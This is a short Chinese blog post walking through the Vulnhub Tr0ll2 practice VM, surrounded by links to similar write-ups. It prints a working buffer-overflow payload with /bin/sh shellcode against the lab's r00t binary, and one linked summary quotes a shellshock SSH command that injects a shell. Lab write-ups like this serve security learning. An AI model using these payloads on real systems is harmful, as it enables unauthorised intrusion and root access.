Vulnhub靶机 Tr0ll2

最新推荐文章于 2024-03-02 17:01:02 发布

菜浪马废

最新推荐文章于 2024-03-02 17:01:02 发布

阅读量581

点赞数 1

分类专栏： vulnhub

本文链接：https://blog.csdn.net/qq_38005854/article/details/105752306

版权

vulnhub 专栏收录该内容

45 篇文章 2 订阅

订阅专栏

在这里插入图片描述

80什么也没找到
ftp倒是登录成功了
下载文件

在这里插入图片描述

需要密码
去看看之前看到的图片

在这里插入图片描述

以为是密码
结果是网页

在这里插入图片描述

速度好快啊
直接密码就出来了

在这里插入图片描述

./r00t $(python -c 'print "A"*268 + "\x70\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80" ')

在这里插入图片描述
缓冲区还是有点蒙蔽
七天去弄这个应该够了
加油

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

菜浪马废

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Vulnhub靶机 Tr0ll2

80什么也没找到ftp倒是登录成功了下载文件需要密码去看看之前看到的图片以为是密码结果是网页速度好快啊直接密码就出来了完了缓冲区溢出我不会啊我不会我不想做缓冲区溢出的题...
复制链接

扫一扫

专栏目录

VulnHub-Tr0ll1.zip

01-12

VulnHub-Tr0ll1靶机学习笔记，一部分是学习笔记过程，另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档，供大家参考学习

OSCP练习：vulhub靶机TR0LL 2攻略

weixin_47311099的博客

04-22

4374

信息收集主机发现先用namp做个扫描在这里插入图片描述发现21ftp、22ssh、80http 网站信息收集访问web页面，跟上一关一样没啥东西爆一下网站目录发现robots文件中告诉我们一些路径，将其保存当作dirb字典在进行爆破果然又发现了几个路径，但是所有页面都是同一个图…以及一句话… 但是！当我们把图片下载下来，算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样！看一眼图片二进制发现重要信息，y0ur_self会是突破电 strings cat_t

参与评论您还未登录，请先登录后发表或查看评论

Troll2打靶思路详解（vulnhub）

最新发布

MCcming的博客

03-02

1644

还是尝试用Hydra进行弱口令爆破并没有什么发现。

Tr0ll2 vulnhub靶场（缓冲区溢出）

weixin_62621015的博客

03-12

815

Tr0ll2 vulnhub靶场（缓冲区溢出漏洞）

No.9-VulnHub-Tr0ll:2-Walkthrough渗透学习

qq_34801745的博客

01-06

1895

** VulnHub-Tr0ll:2-Walkthrough ** 靶机地址：https://www.vulnhub.com/entry/tr0ll-2,107/ 靶机难度：中级（CTF）靶机发布日期：2014年10月24日靶机描述：Tr0ll系列VM中的下一台计算机，这比原始的Tr0ll难度有所提高，但是解决所需的时间大致相同，并且毫无疑问，巨魔仍然存在！难度是从初学者到中级。目标：得到...

linux shellshock漏洞,shellshock漏洞分析

weixin_28706923的博客

05-18

310

这是tr0ll2靶机涉及到的东西，先看一下在这个靶机上的过程。我们获取了noob用户的ssh密钥，之后登录却失败了：之后我们输入如下命令：ssh noob@192.168.16.141 -i noob -t '() { :;}; /bin/bash'再次登录，居然成功了：以上就是shellshock攻击，其利用的是bash在导入环境变量函数时候的漏洞，启动bash的时候，它不仅会导入这个函数，也...

vulnhub靶机实战-My-cmsms靶机

09-29

vulnhub靶机实战-My-cmsms靶机本文档将针对vulnhub靶机实战-My-cmsms靶机，详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。主机发现在靶机实战中，主机发现是指通过各种技术手段来发现目标网络中...

Vulnhub靶机渗透测试 DC-8靶机

12-07

Vulnhub靶机渗透测试 DC-8靶机

Vulnhub靶机渗透测试 DC-3靶机

12-07

Vulnhub靶机渗透测试 DC-3靶机

Vulnhub靶机渗透测试 DC-7靶机

12-07

Vulnhub靶机渗透测试 DC-7靶机

VulnHub-TR0LL: 2-靶机渗透学习

嗯嗯呐的博客

12-02

1106

**靶机地址：https://www.vulnhub.com/entry/tr0ll-2,107/ 靶机难度：中级（CTF）靶机描述：Tr0ll系列VM中的下一台计算机，这比原始的Tr0ll难度有所提高，但是解决所需的时间大致相同，并且毫无疑问，巨魔仍然存在！难度是从初学者到中级。目标：得到root权限目录信息收集fcrackzip爆破SSH用户枚举漏洞shellshock攻击缓冲区溢出提权总结信息收集 nmap确定靶机地址 nmap扫描靶机端口扫描出三个端口 21 FTP 22 ssh 80

2、vulnhub-tr0ll-2

qq_42660246的博客

09-18

135

成功登录ssh三种方式，详见链接：https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh。前面找到偏移量之后，可以知道栈空间大小占据空间位置，接下来要找到跳板地址也就是ESP，就可以跳到恶意代码shellcode的位置。类型压缩文件密码的工具，工具小巧方便、破解速度快，能使用字典和指定字符集破解，适用于。发现下载下来的4个图片中，2.jpg 明显不同，使用16进行编辑器查看。

9-vulnhub-Tr0ll2

尼德霍格007

07-27

381

VulnHub-Tr0ll2 靶机地址：https://www.vulnhub.com/entry/tr0ll-2,107/ 目标：得到root权限&找到proof.txt 作者：尼德霍格007 时间：2021-7-27 一、信息收集打开kali虚拟机和目标机，两台虚拟机网络都处于NAT模式 kali查看本机IP段，我的是192.168.21.0/24 nmap扫一下本网段 nmap -sP 192.168.21.0/24 目标机IP地址是192.168.21.145 扫描开放端口 nmap

Linux unzip命令

dency

05-27

390

Linux unzip命令用于解压缩zip文件 unzip为.zip压缩文件的解压缩程序。语法 unzip [-cflptuvz][-agCjLMnoqsVX][-P <密码>][.zip文件][文件][-d <目录>][-x <文件>] 或 unzip [-Z] 参数： -c 将解压缩的结果显示到屏幕上，并对字符做适当的转换。 -f 更新现有的文件。 -l 显示压缩文件内所包含的文件。 -p 与-c参数类似...

vulnhub Tr0ll: 2

箭雨镜屋

12-30

2375

本文思路： nmap扫描---->dirb扫描发现robots---->dirb配合找到的字典爆破目录---->访问目录下载图片---->strings考察图片，发现新目录y0ur_self---->访问y0ur_self目录，获得字典answer.txt---->弱口令登录ftp---->用fcrackzip爆破lmao.zip密码---->通过密钥ssh登录，得到noob用户的shell---->linpeas.sh探测提权途径---->利用缓冲区溢出漏洞提权

VulnHub靶场系列-Tr0ll2

rlenew的博客

05-28

657

主机：192.168.136.133 靶机：192.168.136.158 先用nmap扫描网段发现目标主机以及其开放的端口和服务登陆主页按照惯例查看一下源代码发现一个有用的信息Author:Tr0ll，试一下利用这个能不能登上ftp 下载这个压缩包但是提示需要密码解压然后再深层次扫描一下看看有没有其他漏掉的信息登上robots.txt看看有没有其他有用的发现有超级多个文件，经过一次次查看，发现在don’t_bother有一张图片在源代码查看发现存在隐藏文件，下载图片用ca

vulnhub-Tr0ll: 2 （考点：脑洞/猜猜猜/linux缓冲区溢出）

冬萍子癸水

04-23

423

https://www.vulnhub.com/entry/tr0ll-2,107/ nat模式， arp-scan -l 比平常多出来的ip就是靶机这靶机跟上一个同名作品1一样继续考脑洞，猜猜猜，后面的缓冲区溢出，更是3个door不停的变换加断掉ssh加禁止ls等，够无聊的。。。。这个缓冲区溢出，也挺诡异，我搜了这台靶机中国人写的外国人写的很多文章。esp地址和shellcode有的人这个可...

Vulnhub系列-Tr0ll-2

Yasso的博客

12-24

649

靶机：192.168.249.136 kali: 192.168.249.132 一、信息收集 nmap -sV -sS -A 192.168.249.136 –查看开放端口及服务 –ftp 21端口发现需要用户名和密码— 猜测用户名可能是Tr0ll 试了试密码也是这个有个zip但要密码 dirb http://192.168.249.136/–对80端口http服务深入探测– –robots(.txt)可以正常访问– –应该是目录，作为字典扫一下— dirb http://192.168.2

渗透测试靶机---Tr0ll

久恙502的博客

10-28

342

渗透测试，打靶经历记录，大佬多多指点，谢谢！

vulnhub靶机——raven: 2

09-03

Raven: 2是一台中级难度的boot2root虚拟机，目标是获取四个标志(flag)。Raven Security在多次遭受入侵后，采取了额外措施来加固他们的web服务器，以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件，并使用VirtualBox打开。123 #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列：Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]